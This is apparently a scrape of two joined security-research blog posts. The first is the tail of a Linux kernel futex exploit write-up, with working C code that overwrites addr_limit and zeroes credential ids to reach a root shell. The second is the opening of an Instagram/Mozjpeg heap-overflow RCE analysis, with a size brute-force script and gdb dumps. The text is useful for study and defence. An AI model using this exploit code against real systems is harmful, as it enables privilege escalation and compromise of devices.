/* how to get the thread information struct from C */
static inline struct thread_info *current_thread_info(void)
	return (struct thread_info *)
		(current_stack_pointer & ~(THREAD_SIZE - 1));

We have a hold of the thread_info location in memory.

Overwriting Address Limit

Just as we can read by corrupting the list, we can utilize the same technique in order to use it for writing purposes. The first memory area that we’ll be targeting is what’s called the “Address Limit”.

It lays under thread_info.addr_limit as you can see in thread_info above. It is used for limiting the virtual address space that is reserved for the user. When the kernel works with user-provided addresses, it compares them to the thread’s addr_limit in order to verify that it’s a valid userspace address. If the supplied address is smaller than addr_limit, the designated memory area is in fact from userspace.

The addr_limit is an excellent target for initial kernel overwrite because once you overwrite it with 0xffffffff, you have gotten full arbitrary read and write capabilities to kernel memory.

void kmemcpy(void *src, void *dst, size_t len)
    int pipefd[2];

    assert(write(pipefd[1], src, len) == len);
    assert(read(pipefd[0], dst, len) == len);

void escalate_priv_sighandler()
    struct task_struct *corrupter_task, *main_task;
    struct cred *main_cred;
    unsigned int root_id = 0;
    void *highest_addr = (void *)-1;
    unsigned int i;

    puts(USERLOG "Escalating main thread's privileges to root.");

    kmemcpy(&highest_addr, &corrupter_thread_info->addr_limit, sizeof(highest_addr));
    printf(USERLOG "Written 0x%x to addr_limit.\n", -1);

    kmemcpy(&corrupter_thread_info->task, &corrupter_task, sizeof(corrupter_thread_info->task));
    printf(USERLOG "Corrupter's task_struct @ %p\n", corrupter_task);

    kmemcpy(&corrupter_task->group_leader, &main_task, sizeof(corrupter_task->group_leader));
    printf(USERLOG "Main thread's task_struct @ %p\n", main_task);

    kmemcpy(&main_task->cred, &main_cred, sizeof(main_task->cred));
    printf(USERLOG "Main thread's cred @ %p\n", main_cred);

    for (i = 0; i < COUNT_OF(main_cred->ids); i++)
        kmemcpy(&root_id, &main_cred->ids[i], sizeof(root_id));

    puts(USERLOG "Escalated privileges to root successfully.");

void escalate_priv()
    pthread_t addr_limit_writer;

    struct sigaction sigact = {.sa_handler = escalate_priv_sighandler};
    assert(!sigaction(SIGINT, &sigact, NULL));
    puts(USERLOG "Registered the privileges escalator signal handler for interrupting the corrupter thread.");

    fake_waiter.list_entry.prio_list.prev = (struct list_head *)&corrupter_thread_info->addr_limit;
    assert(!pthread_create(&addr_limit_writer, NULL, lock_pi_futex, NULL));

    pthread_kill(corrupter, SIGINT);

After we’ve executed leak_thread_info(), we’re going to call escalate_priv(). The first thing that it does is register escalate_priv_sighandler as the SIGINT signal handler using the sigaction() syscall.

Let’s briefly mention what signal handlers are and why do we use them. A signal handler is a function that is called by the target environment when the corresponding signal occurs. The target environment suspends execution of the program until the signal handler returns.

This mechanism allows us to interrupt the process’ job in order to perform some other work. In our case, we’d like to form the kernel stack in a certain way and also be able to execute a piece of code on the same thread. However, in order to arrange the stack we have to perform a blocking operation because otherwise our arrangement would be overwritten, but if you block you can’t exploit the stack’s state.

That’s why signal are needed and why they’re used in our scenario. They allow us to execute code within the process’ context outside its normal execution flow.

I’m reminding you that when talking about pthreads, all the signal handlers are shared with the parent process, that is because internally pthreads passes both CLONE_THREAD | CLONE_SIGHAND flags when it creates the child process with clone().

The flags mask must also include CLONE_SIGHAND if CLONE_THREAD is specified.

Afterwards, we’re going to place the address that we want to write to, that is &corrupter_thread_info->addr_limit, as the fake waiter’s previous node. Once we’ll attempt to lock the futex, the newly created waiter would write its own address to the addr_limit. Not yet something that we can control, but rather a value that is guaranteed to be bigger than the current one because addr_limit is at the bottom-most of the virtual address space.

Now we’ve arrived to a scenario where addr_limit > &addr_limit is surely true. Once this is condition is met, we can simply write to addr_lmit once again on our own! This is where the signaling come into play, and specifically the escalate_priv_sighandler from earlier.

Because each thread has its own thread_info, which in turn means that each thread also has its own addr_limit, we’d need a way to interrupt the specific thread whose addr_limit we’ve overwritten. Therefore, after we’ve “increased” the address limit, only that thread would be able to utilize and exploit this feature. This is where we signal the addr_limit_writer thread using pthread_kill() which triggers the execution of escalate_priv_sighandler.

What this function does is read and write to different areas in kernel memory. In order to do it, I wrote a small helper function called kmemcpy(). It exploits the fact that addr_limit had been overwritten, it creates a pipe which it reads from and writes to. The read() and write() syscalls internally invoke copy_from_user() and copy_to_user() within the kernel which do the checks according to addr_limit.

unsigned long
_copy_from_user(void *to, const void __user *from, unsigned long n)
	if (access_ok(VERIFY_READ, from, n)) // <-- addr_limit comparison
		n = __copy_from_user(to, from, n);
		memset(to, 0, n);
	return n;

unsigned long
copy_to_user(void __user *to, const void *from, unsigned long n)
	if (access_ok(VERIFY_WRITE, to, n)) // <-- addr_limit comparison
		n = __copy_to_user(to, from, n);
	return n;

#define access_ok(type, addr, size) \
	(likely(__range_not_ok(addr, size, user_addr_max()) == 0))

#define user_addr_max() (current_thread_info()->addr_limit.seg)

At the signal handler several operations are done.

  1. Cancel the address space access limitation by setting addr_limit to the highest value possible.
  2. Read the task_struct pointer of the corrupted thread.
  3. Read the parent’s task_struct pointer from the corrupted thread’s task_struct via the group_leader member which points to it.
  4. Read the cred struct pointer from the parent’s task_struct.
  5. Overwrite all the identifiers (uid, gid, suid, sgid, etc.) of the main cred struct.

Popping Shell

Now all that’s left to do is system("/bin/sh") on the main thread to drop a shell.
Because the child process inherits the cred struct, the shell will also be in root permissions.


This has been a lot of fun, and I’ve learned so much on the way.
I got to have the interaction I desired with the kernel, working with it and understanding how it works a bit better. Needless to say, there’s an infinite amount of knowledge to be gathered, but that’s a small step onwards. At the end, the exploit seems relatively short, but the truly important part is getting there and being able to solve the puzzle.

The full repository can be found here.

If you have any questions, feel free to contact me and I’ll gladly answer.
Hope you enjoyed the read. Thanks!

Special thanks to Nspace who helped throughout the process.

#Instagram_RCE: Code Execution Vulnerability in Instagram App for Android and iOS

Original text by Gal Elbaz


Instagram, with over 100+ million photos uploaded every day, is one of the most popular social media platforms. For that reason, we decided to audit the security of the Instagram app for both Android and iOS operating systems. We found a critical vulnerability that can be used to perform remote code execution on a victim’s phone.

Our modus operandi for this research was to examine the 3rd party projects used by Instagram.

Many software developers, regardless of their size, utilize open-source projects in their software. We found a vulnerability in the way that Instagram utilizes Mozjpeg,  the open source project used as their JPEG format decoder.

In the attack scenario we describe below, an attacker simply sends an image to the victim via email, WhatsApp or other media exchange platforms. When the victim opens the Instagram app, the exploitation takes place.

Tell me who your friends are and I’ll tell you your vulnerabilities

We all know that even the biggest companies rely on public open-source projects and that those projects are integrated into their apps with little to no modifications.

Most companies using 3rd party open-source projects declare it, but not all libraries appear in the app’s About page. The best way to be sure you see all the libraries is to go to the lib-superpack-zstd folder of the Instagram app:

Figure 1. Shared objects used by Instagram.

In the image below, you can see that when you upload an image using Instagram, three shared objects are loaded: libfb_mozjpeg.so, libjpegutils_moz.so, and libcj_moz.so.

Figure 2. Mozjpeg’s shared objects.

The “moz” suffix is short for “mozjpeg,” which is short for Mozilla JPEG Encoder Project but what do these modules do?

What is Mozjpeg?

Let’s start with a brief history of the JPEG format. JPEG is an image file format that’s been around since the early 1990s, and is based on the concept of lossy compression, meaning that some information is lost in the compression process, but this information loss is negligible to the human eye. Libjpeg is the baseline JPEG encoder built into the Windows, Mac and Linux operating systems and is maintained by an informal independent group. This library tries to balance encoding speed and quality with file size.

In contrast, Libjpeg-turbo is a higher performance replacement for libjpeg, and is the default library for most Linux distributions. This library was designed to use less CPU time during encoding and decoding.

On March 5, 2014, Mozilla announced the “Mozjpeg” project, a JPEG encoder built on top of libjpeg-turbo, to provide better compression for web images, at the expense of performance.

 The open-source project is specifically for images on the web. Mozilla forked libjpeg-turbo in 2014 so they could focus on reducing file size to lower bandwidth and load web images more quickly.

Instagram decided to split the mozjpeg library into 3 different shared objects:

  • libfb_mozjpeg.so – Responsible for the Mozilla-specific decompression exported API.
  • libcj_moz.so – The libjeg-turbo that parses the image data.
  • libjpegutils_moz.so – The connector between the two shared objects. It holds the exported API that the JNI calls to trigger the decompression from the Java application side.


Our team at CPR built a multi-processor fuzzing lab that gave us amazing results with our Adobe Research, so we decided to expand our fuzzing efforts to Mozjpeg as well.

As libjpeg-turbo was already heavily fuzzed, we focused on Mozjpeg.

The primary addition made by Mozilla on top of libjpeg-turbo was the compression algorithm, so that is where set our sights.

AFL was our weapon of choice, so naturally we had to write a harness for it.

To write the harness, we had to understand how to instrument the Mozjpeg decompression function.

Fortunately, Mozjpeg comes with a code sample explaining how to use the library:

do_read_JPEG_file(struct jpeg_decompress_struct *cinfo, char *filename)
  struct my_error_mgr jerr;
  /* More stuff */

  FILE *infile;                 /* source file */
  JSAMPARRAY buffer;            /* Output row buffer */
  int row_stride;               /* physical row width in output buffer */

  if ((infile = fopen(filename, "rb")) == NULL) {
    fprintf(stderr, "can't open %s\\n", filename);
    return 0;

/* Step 1: allocate and initialize JPEG decompression object */
  /* We set up the normal JPEG error routines, then override error_exit. */

  cinfo->err = jpeg_std_error(&jerr.pub);
  jerr.pub.error_exit = my_error_exit;

  /* Establish the setjmp return context for my_error_exit to use. */
  if (setjmp(jerr.setjmp_buffer)) {
    return 0;

/* Now we can initialize the JPEG decompression object. */

  /* Step 2: specify data source (eg, a file) */
  jpeg_stdio_src(cinfo, infile);

  /* Step 3: read file parameters with jpeg_read_header() */
  (void)jpeg_read_header(cinfo, TRUE);

  /* Step 4: set parameters for decompression */
  /* In this example, we don't need to change any of the defaults set by
   * jpeg_read_header(), so we do nothing here.
  /* Step 5: Start decompressor */

  /* JSAMPLEs per row in output buffer */
  row_stride = cinfo->output_width * cinfo->output_components;

  /* Make a one-row-high sample array that will go away when done with image */
  buffer = (*cinfo->mem->alloc_sarray)
                ((j_common_ptr)cinfo, JPOOL_IMAGE, row_stride, 1);

  /* Step 6: while (scan lines remain to be read) */
  /*           jpeg_read_scanlines(...); */
  while (cinfo->output_scanline < cinfo->output_height) {
    (void)jpeg_read_scanlines(cinfo, buffer, 1);
    /* Assume put_scanline_someplace wants a pointer and sample count. */
    put_scanline_someplace(buffer[0], row_stride);

  /* Step 7: Finish decompression */

  /* Step 8: Release JPEG decompression object */

  return 1;

However, to make sure any crash we found in Mozjpeg impacts Instagram itself, we need to see how Instagram integrated Mozjpeg to their code.

Luckily, below you can see that Instagram copy-pasted the best practice for using the library:

                      Figure 3. Instagram’s implementation for using Mozjpeg.

As you can see, the only thing they really changed was to replace the put_scanline_someplace dummy function from the example code with read_jpg_copy_loop which utilizes memcpy.

Our harness receives generated image files from AFL and sends them to the wrapped Mozjpeg decompression function.

We ran the fuzzer for only a single day with 30 CPU cores, and AFL notified us about 447 unique “unique” crashes.

After triaging the results, we found an interesting crash related to the parsing of the image dimensions of JPEG. The crash was an out-of-bounds write and we decided to focus on it.


The vulnerable function is read_jpg_copy_loop which leads to an integer overflow during the decompression process. 

Figure 4. Read_jpg_copy_loop code snippet from IDA.

The vulnerable function handles the image dimensions when parsing JPEG image files. Here’s a pseudo code from the original vulnerable code:

width = rect->right - rect->bottom;
height = rect->top - rect->left;

allocated_address = __wrap_malloc(width*height*cinfo->output_components);// <---Integer overflow

bytes_copied = 0;

 while ( 1 ){
   output_scanline = cinfo->output_scanline;

   if ( (unsigned int)output_scanline >= cinfo->output_height )

    //reads one line from the file into the cinfo buffer
    jpeg_read_scanlines(cinfo, line_buffer, 1);

    if ( output_scanline >= Rect->left && output_scanline < Rect->top )
        memcpy(allocated_address + bytes_copied , line_buffer, width*output_component);// <--Oops
        bytes_copied += width * output_component;

First, let’s understand what this code does.

The _wrap_malloc function allocates a memory chunk based on 3 parameters which are the image dimensions. Both width and height are 16 bit integers (uint16_t) that are parsed from the file.

cinfo->output_component tells us how many bytes represent each pixel. 

This variable can vary from 1 for Greyscale, 3 for RGB, and 4 for RGB + Alpha\CMYK\etc.

In addition to height and width, the output_component is also completely controlled by the attacker. It is parsed from the file and is not validated with regards to the remaining data available in the file.

__warp_malloc expects its parameters to be passed in 32bit registers! That means if we can cause the allocation size to exceed (2^32) bytes, we have an integer overflow that leads to a much smaller allocation than expected.

The allocated size is calculated by multiplying the image’s width, height and output_components. Those sizes are unchecked and in our control. When abused, they lead to an integer overflow.

__wrap_malloc(width * height * cinfo->output_components);// <---- Integer overflow

Conveniently enough, this buffer is then passed to memcpy, leading to a heap-based buffer overflow.

After the allocation, the memcpy function is called and copies the image data to the allocated memory.

The copying is conducted line by line. 

memcpy(allocated_address + bytes_copied ,line_buffer, width*output_component);//<--Oops

A data of size (width*output_component) is copied (height) times.

It’s a promising-looking bug from an exploitation perspective: a linear heap-overflow gives the attacker control over the size of the allocation, the amount of overflow, and the contents of the overflowed memory region.

Wild Copy Exploitation

To cause the memory corruption, we need to overflow the integer determining the allocation size; our calculation must exceed 32 bits. We are dealing with a wildcopy which means we are trying to copy data that is larger than 2^32 (4GB). Therefore, there is an extremely high probability the program will crash when the loop reaches an unmapped page:

  Figure 5. Segfault caused by our wildcopy.

So how can we exploit this?

Before we dive into wildcopy exploitation techniques, we need to differentiate our case from the classic case of wildcopy like in the Stagefright bug. The classic case usually involves one memcpy that writes 4GB of data. 

However, in our case there is a for loop that tries to copy X bytes Y times while X * Y is 4GB. 

When we try to exploit such a memory corruption vulnerability, we need to ask ourselves a few important questions:

  • Can we control (even partially) the content of the data we are corrupting with?
  • Can we control the length of the data we are corrupting with?
  • Can we control the size of the allocated chunk we overflow?

This last question is especially important because in Jemalloc/LFH (or every bucket-based allocator), if we can’t control the size of the chunk we are corrupting from, it might be difficult to shape the heap such that we could corrupt a specific target structure, if that structure is in a significantly different size.

At first glance, it seems clear that the answer to the first question, about our ability to control the content, is “yes”, because we control the content of the image data.

Now, moving on to the second question – controlling the length of the data we corrupt with. The answer here is also clearly “yes” because the memcpy loop copies the file line by line and the size of each line copied is a multiplication of the width argument and output_component that are controlled by the attacker.

 The answer to the 3rd question, about the size of the buffer we corrupt, is trivial. 

As it is controlled by `width * height * cinfo->output_components`, we wrote a small Python script that gives us what these 3 parameters should be, according to the chunk size we wish to allocate, considering the effect of the integer overflow:

import sys

def main(low=None, high=None):
    res = []
    print("brute forcing...")

    for a in range(0xffff):
        for b in range(0xffff):
             x = 4 * (a+1) * (b+1) - 2**32
             if 0 < x <= 0x100000:#our limit
                 if (not low or (x > low)) and (not high or x <= high):
        res.append((x, a+1, b+1)) 

    for s, x, y in sorted(res, key=lambda i: i[0]):
         print "0x%06x, 0x%08x, 0x%08x" % (s, x, y)

if __name__ == '__main__':

    high = None
    low = None 

    if len(sys.argv) == 2:
        high = int(sys.argv[1], 16)

    elif len(sys.argv) == 3:
         high = int(sys.argv[2], 16)
         low = int(sys.argv[1], 16) 

    main(low, high)

Now that we have our prerequisites for exploiting a wildcopy, let’s see how we can utilize them.

To trigger the vulnerability, we must specify a size larger than 2^32 bytes. In practice, we need to stop the wildcopy before we reach the unmapped memory.

We have a number of options:

  • Rely on a race condition – While the wildcopy corrupts some useful target structures or memory, we can race a different thread to use that now corrupted data to do something before the wildcopy crashes (e.g., construct other primitives, terminate the wildcopy, etc.).
  • If the wildcopy loop has some logic that can stop the loop under certain conditions, we can mess with these checks and stop after it corrupts enough data. 
  • If the wildcopy loop has a call to a virtual function on every iteration, and that pointer to a function is in a structure in heap memory (or at another memory address we can corrupt during the wildcopy), the exploit can use the loop to overwrite and divert execution during the wildcopy.

Sadly, the first option isn’t applicable here because we are attacking from an image vector. Therefore, we don’t have any control over threads so the race condition option does not help. 

To use the second approach, we looked for a kill-switch to stop the wildcopy. We tried cutting the file in half while keeping the same size in the image header. However, we found out that if the library reaches an EOF marker, it just adds another EOF marker, so we end up in an infinite loop of EOF markers. 

We also tried looking for an ERREXIT function that could stop the decompression process at runtime, but we learned that no matter what we do, we can never reach a path that leads to ERREXIT in this code. Therefore, the second option isn’t applicable either.

To use the third option, we need to look for a virtual function that gets called on every iteration of our wildcopy loop.

Let’s go back to the loop logic where the memcpy copy occurs:

while ( 1 ){

   output_scanline = cinfo->output_scanline;

   if ( (unsigned int)output_scanline >= cinfo->output_height )

    jpeg_read_scanlines(cinfo, line_buffer, 1);
    if ( output_scanline >= Rect->left && output_scanline < Rect->top )
        memcpy(allocated_address + bytes_copied , line_buffer, width*output_component)
        bytes_copied += width * output_component;

We can see that we have only one function that gets called on every iteration besides our overriding memcpy… 

jpeg_read_scanlines to the rescue!

Let’s examine the jpeg_read_scanlines code:


jpeg_read_scanlines(j_decompress_ptr cinfo, JSAMPARRAY scanlines,
                    JDIMENSION max_lines)

  JDIMENSION row_ctr;

  if (cinfo->global_state != DSTATE_SCANNING)
    ERREXIT1(cinfo, JERR_BAD_STATE, cinfo->global_state);

  if (cinfo->output_scanline >= cinfo->output_height) {
    return 0;

  /* Call progress monitor hook if present */
  if (cinfo->progress != NULL) {
    cinfo->progress->pass_counter = (long)cinfo->output_scanline;
    cinfo->progress->pass_limit = (long)cinfo->output_height;
    (*cinfo->progress->progress_monitor) ((j_common_ptr)cinfo);

  /* Process some data */
  row_ctr = 0;
  (*cinfo->main->process_data) (cinfo, scanlines, &row_ctr, max_lines);
  cinfo->output_scanline += row_ctr;
  return row_ctr;

As you can see, we have a call to a virtual function process_data each time that jpeg_read_scanlines gets called to read another line from the file.

The line being read from the file is copied to a buffer called `row_ctr` inside a struct called cinfo.

(*cinfo->main->process_data) (cinfo, scanlines, &row_ctr, max_lines);

proccess_data points to another function called process_data_simple_main:

process_data_simple_main(j_decompress_ptr cinfo, JSAMPARRAY output_buf,
                         JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
  my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
  JDIMENSION rowgroups_avail;
  /* Read input data if we haven't filled the main buffer yet */
  if (!main_ptr->buffer_full) {
    if (!(*cinfo->coef->decompress_data) (cinfo, main_ptr->buffer))
    main_ptr->buffer_full = TRUE;      
  rowgroups_avail = (JDIMENSION)cinfo->_min_DCT_scaled_size;
  /* Feed the postprocessor */
  (*cinfo->post->post_process_data) (cinfo, main_ptr->buffer,
                                     &main_ptr->rowgroup_ctr, rowgroups_avail,
                                     output_buf, out_row_ctr, out_rows_avail);
  /* Has postprocessor consumed all the data yet? If so, mark buffer empty */
  if (main_ptr->rowgroup_ctr >= rowgroups_avail) {
    main_ptr->buffer_full = FALSE;
    main_ptr->rowgroup_ctr = 0;

From process_data_simple_main, we can identify 2 more virtual functions that get called in every iteration. They all have a cinfo struct as a common denominator.

What is this cinfo?

Cinfo is a struct that is passed around during the Mozjpeg various functionality. It holds crucial members, function pointers and image meta-data.

Let’s look at cinfo struct from Jpeglib.h

struct jpeg_decompress_struct { 
            struct jpeg_error_mgr *err;   
           struct jpeg_memory_mgr *mem;  
        struct jpeg_progress_mgr *progress; 
        void *client_data;            
        boolean is_decompressor;     
        int global_state 
            struct jpeg_source_mgr *src;
            JDIMENSION image_width;
            JDIMENSION image_height;
            int num_components;
        J_COLOR_SPACE out_color_space;
       unsigned int scale_num
       JDIMENSION output_width;      
       JDIMENSION output_height;     
       int out_color_components;     
       int output_components;        
       int rec_outbuf_height;
       int actual_number_of_colors;  
       boolean saw_JFIF_marker;      
       UINT8 JFIF_major_version;    
       UINT8 JFIF_minor_version;
       UINT8 density_unit;           
       UINT16 X_density;             
       UINT16 Y_density;             
       int unread_marker;
          struct jpeg_decomp_master *master;    
       struct jpeg_d_main_controller *main;  <<-- there’s a function pointer here
       struct jpeg_d_coef_controller *coef; <<-- there’s a function pointer here
       struct jpeg_d_post_controller *post; <<-- there’s a function pointer here
       struct jpeg_input_controller *inputctl; 
       struct jpeg_marker_reader *marker;
       struct jpeg_entropy_decoder *entropy;
       . . .
       struct jpeg_upsampler *upsample;
       struct jpeg_color_deconverter *cconvert
        . . .

In the cinfo struct, we can see 3 pointers to functions that we can try to overwrite during the overwrite loop and divert the execution flow.

It turns out that the third option is applicable in our case!

Jemalloc 101

Before we dive into the Jemalloc exploitation concepts, we need to understand how Android’s heap allocator works, as well as all of the terms that we focus on in the next chapter – Chunks, Runs, Regions.

Jemalloc is a bucket-based allocator that divides memory into chunks, always of the same size, and uses these chunks to store all of its other data structures (and user-requested memory as well). Chunks are further divided into ‘runs’ that are responsible for requests/allocations up to certain sizes. A run keeps track of free and used ‘regions’ of these sizes. Regions are the heap items returned on user allocations (malloc calls). Finally, each run is associated with a ‘bin.’ Bins are responsible for storing structures (trees) of free regions.

Figure 6. Jemalloc basic design.

Controlling the PC register

We found 3 good function pointers that we can use to divert execution during the wildcopy and control the PC register.

The cinfo struct has these members:

  • struct jpeg_d_post_controller *post
  • struct jpeg_d_main_controller *main
  • struct jpeg_d_coef_controller *coef

These 3 structs are defined in Jpegint.h

/* Main buffer control (downsampled-data buffer) */
struct jpeg_d_main_controller {
  void (*start_pass) (j_decompress_ptr cinfo, J_BUF_MODE pass_mode);
  void (*process_data) (j_decompress_ptr cinfo, JSAMPARRAY output_buf,
                        JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail);
/* Coefficient buffer control */
struct jpeg_d_coef_controller {
  void (*start_input_pass) (j_decompress_ptr cinfo);
  int (*consume_data) (j_decompress_ptr cinfo);
  void (*start_output_pass) (j_decompress_ptr cinfo);
  int (*decompress_data) (j_decompress_ptr cinfo, JSAMPIMAGE output_buf);
  jvirt_barray_ptr *coef_arrays;
/* Decompression postprocessing (color quantization buffer control) */
struct jpeg_d_post_controller {
  void (*start_pass) (j_decompress_ptr cinfo, J_BUF_MODE pass_mode);
  void (*post_process_data) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
                             JDIMENSION *in_row_group_ctr,
                             JDIMENSION in_row_groups_avail,
                             JSAMPARRAY output_buf, JDIMENSION *out_row_ctr,
                             JDIMENSION out_rows_avail);

We need to find where the 3 structures are located in the heap memory, so we can override at least one of them to gain control of the PC register.

To figure that out, we need to know what the heap looks like when we decompress an image using Mozjpeg.

Mozjpeg’s internal memory manager

Let’s recall one of cinfo’s most important struct members:

struct jpeg_memory_mgr *mem;  /* Memory manager module */ 

Mozjpeg has its own memory manager. The JPEG library’s memory manager controls allocating and freeing memory, and it manages large “virtual” data arrays. All memory and temporary file allocation within the library is done via the memory manager. This approach helps prevent storage-leak bugs, and it speeds up operations whenever malloc/free are slow.

The memory manager creates “pools” of free storage, and a whole pool can be freed at once.

Some data is allocated “permanently” and is not freed until the JPEG object is destroyed.

Most of the data is allocated “per image” and is freed by jpeg_finish_decompress or jpeg_abort functions.

For example, let’s look at one of the allocations that Mozjpeg did as part of the image decoding process. When Mozjpeg asks to allocate 0x108 bytes, in reality malloc is called with the size 0x777. As you can see, the requested size and the actual size allocated are different. 

Let’s analyze this behavior. 

Mozjpeg uses wrapper functions for small and big allocations alloc_small and alloc_large

alloc_small(j_common_ptr cinfo, int pool_id, size_t sizeofobject){
hdr_ptr = (small_pool_ptr)jpeg_get_small(cinfo, min_request + slop);
slop = first_pool_slop[1] == 16000
min_request = sizeof(small_pool_hdr) + sizeofobject + ALIGN_SIZE - 1;
sizeofobject == round_up_pow2(0x120, ALIGN_SIZE) == 0x120
ALIGN_SIZE   == 16
sizeof(small_pool_hdr) = 0x20

static const size_t first_pool_slop[JPOOL_NUMPOOLS] = {
                    1600,                    /* first PERMANENT pool */
                    16000                    /* first IMAGE pool */

When calling jpeg_get_small, it is basically calling malloc.

GLOBAL(void *)
jpeg_get_small(j_common_ptr cinfo, size_t sizeofobject)
  return (void *)malloc(sizeofobject);

The allocated “pools” are managed by alloc_small and the other wrapper functions which maintain a set of members that help them monitor the state of the “pools.” Therefore, whenever there is an allocation request, the wrapper functions check if there is enough space left in the “pool.”

If there is space available, the alloc_small function returns an address from the current “pool” and advances the pointer that points to the free space.

When the “pool” runs out of space, it allocates another “pool” using predefined sizes that it reads from the first_pool_slop array, which in our case are 1600 and 16000.

static const size_t first_pool_slop[JPOOL_NUMPOOLS] = {
                    1600,                    /* first PERMANENT pool */
                    16000                    /* first IMAGE pool */

Now that we understand how Mozjpeg’s memory manager works, we need to figure out which “pool” of memory holds our targeted virtual function pointers.

As part of the decompression process, there are two major functions that decode the image metadata and prepare the environment for later processing. The two major functions jpeg_read_header and jpeg_start_decompress are the only functions that allocate memory until we reach our wild copy loop.

jpeg_read_header parses the different markers from the file. 

While parsing those markers, the second and largest “pool” of size 16000 (0x3e80) gets allocated by the Mozjpeg memory manager. The sizes of the “pools” are const values from the first_pool_slop array (from the code snippet above), which means that the Mozjpeg’s internal allocator already used all of the space of the first pool. 

We know that our targeted maincoef and post structures get allocated from within the jpeg_start_decompress function. We can therefore safely assume that the rest of the allocations (until we reach our wildcopy loop) will end up being in the second big “pool” including the maincoef and post structures that we want to override!

Now let’s have a closer look on how Jemalloc deals with this type of size class allocation. 

Using Shadow to put some light

Allocations returned by Jemalloc are divided into three size classes- small, large, and huge.

  • Small/medium: These regions are smaller than the page size (typically 4KB).
  • Large: These regions are between small/medium and huge (between page size to chunk size).
  • Huge: These are bigger than the chunk size. They are dealt with separately and not managed by arenas; they have a global allocator tree.

Memory returned by the OS is divided into chunks, the highest abstraction used in Jemalloc’s design. In Android, those chunks have different sizes for different versions. They are usually around 2MB/4MB. Each chunk is associated with an arena.

A run can be used to host either one large allocation or multiple small allocations.

Large regions have their own runs, i.e. each large allocation has a dedicated run.

We know that our targeted “pool” size is (0x3e80=16,000 DEC) which is bigger than page size (4K) and smaller than Android chunk size. Therefore, Jemalloc allocates a large run of size (0x5000) each time! 

Let’s take a closer look.

(gdb)info registers X0
X0        0x3fc7
#0  0x0000007e6a0cbd44 in malloc () from target:/system/lib64/libc.so
#1  0x0000007e488b3e3c in alloc_small () from target:/data/data/com.instagram.android/lib-superpack-zstd/libfb_mozjpeg.so
#2  0x0000007e488ab1e8 in get_sof () from target:/data/data/com.instagram.android/lib-superpack-zstd/libfb_mozjpeg.so
#3  0x0000007e488aa9b8 in read_markers () from target:/data/data/com.instagram.android/lib-superpack-zstd/libfb_mozjpeg.so
#4  0x0000007e488a92bc in consume_markers () from target:/data/data/com.instagram.android/lib-superpack-zstd/libfb_mozjpeg.so
#5  0x0000007e488a354c in jpeg_consume_input () from target:/data/data/com.instagram.android/lib-superpack-zstd/libfb_mozjpeg.so
#6  0x0000007e488a349c in jpeg_read_header () from target:/data/data/com.instagram.android/lib-superpack-zstd/libfb_mozjpeg.so

We can see that the actual allocated values sent to malloc are indeed (0x3fc7). This matches the large “pool” size of 16000 (0x3e80) plus the sizes of Mozjpeg’s large_pool_hdr, and the actual size of the object that was supposed to be allocated and ALIGN_SIZE(16/32) – 1.

One thing which can really make a huge difference when implementing heap shaping for an exploit is having a way to visualize the heap: to see the various allocations in the context of the heap.

For this we use a simple tool which allows us to inspect the heap state for a target process during exploit development. We used a tool called “shadow” that argp and vats wrote for visualizing the Jemalloc heap.

We performed a debugging session using shadow over gdb to verify our assumptions regarding the large run that we wish to override.

(gdb) x/164xw 0x729f4f8b98
0x729f4f8b98:    0x9f4f89f0    0x00000072    0xbdfe3040    0x00000072
0x729f4f8ba8:    0x00000000    0x00000000    0x00000014    0x000002a8
0x729f4f8bb8:    0x00000001    0x000000cd    0xbdef79f0    0x00000072
0x729f4f8bc8:    0x00006a44    0x00009a2e    0x00000003    0x00000003
0x729f4f8bd8:    0x0000000c    0x00000001    0x00000001    0x00000000
0x729f4f8be8:    0x00000000    0x3ff00000    0x00000000    0x00000000
0x729f4f8bf8:    0x00000000    0x00000001    0x00000001    0x00000000
0x729f4f8c08:    0x00000002    0x00000001    0x00000100    0x00000000
0x729f4f8c18:    0x00000000    0x00000000    0x00006a44    0x00009a2e
0x729f4f8c28:    0x00000004    0x00000004    0x00000001    0x00000000
0x729f4f8c38:    0x00000000    0x00000000    0x00000000    0x00000001
0x729f4f8c48:    0x00000000    0x00000001    0x00000000    0x00000000
0x729f4f8c58:    0x00000000    0x00000000    0xbdef7a40    0x00000072
0x729f4f8c68:    0xbdef7ad0    0x00000072    0x00000000    0x00000000
0x729f4f8c78:    0x00000000    0x00000000    0xbdef7b60    0x00000072
0x729f4f8c88:    0xbdef7da0    0x00000072    0x00000000    0x00000000
0x729f4f8c98:    0x00000000    0x00000000    0xbdef7c80    0x00000072
0x729f4f8ca8:    0x9f111ca0    0x00000072    0x00000000    0x00000000
0x729f4f8cb8:    0x00000000    0x00000000    0x00000008    0x00000000
0x729f4f8cc8:    0xa63e9be0    0x00000072    0x00000000    0x00000000
0x729f4f8cd8:    0x00000000    0x00000000    0x00000000    0x00000000
0x729f4f8ce8:    0x00000000    0x01010101    0x01010101    0x01010101
0x729f4f8cf8:    0x01010101    0x05050505    0x05050505    0x05050505
0x729f4f8d08:    0x05050505    0x00000000    0x00000000    0x00000101
0x729f4f8d18:    0x00010001    0x00000000    0x00000000    0x00000000
0x729f4f8d28:    0x00000000    0x00000000    0x00000002    0x00000002
0x729f4f8d38:    0x00000008    0x00000008    0x000009a3    0x00000000
0x729f4f8d48:    0xa63e9e00    0x00000072    0x00000003    0x00000000
0x729f4f8d58:    0xa63e9be0    0x00000072    0xa63e9c40    0x00000072
0x729f4f8d68:    0xa63e9ca0    0x00000072    0x00000000    0x00000000
0x729f4f8d78:    0x000006a5    0x000009a3    0x00000006    0x00000000
0x729f4f8d88:    0x00000000    0x00000000    0x00000000    0x00000001
0x729f4f8d98:    0x00000002    0x00000000    0x00000000    0x00000000
0x729f4f8da8:    0x00000000    0x00000000    0x0000003f    0x00000000
0x729f4f8db8:    0x00000000    0x00000008    0xa285d500    0x00000072
0x729f4f8dc8:    0x0000003f    0x00000000    0xbdef7960    0x00000072
0x729f4f8dd8:    0xa63eaa70    0x00000072  <========= main
                            0xa63ea900    0x00000072  <========= post
0x729f4f8de8:    0xa63ea3e0    0x00000072  <========= coef
    0xbdef7930    0x00000072
0x729f4f8df8:    0xbdef7820    0x00000072    0xa63ea790    0x00000072
0x729f4f8e08:    0xa63ea410    0x00000072    0xa63ea2c0    0x00000072
0x729f4f8e18:    0xa63ea280    0x00000072    0x00000000    0x00000000
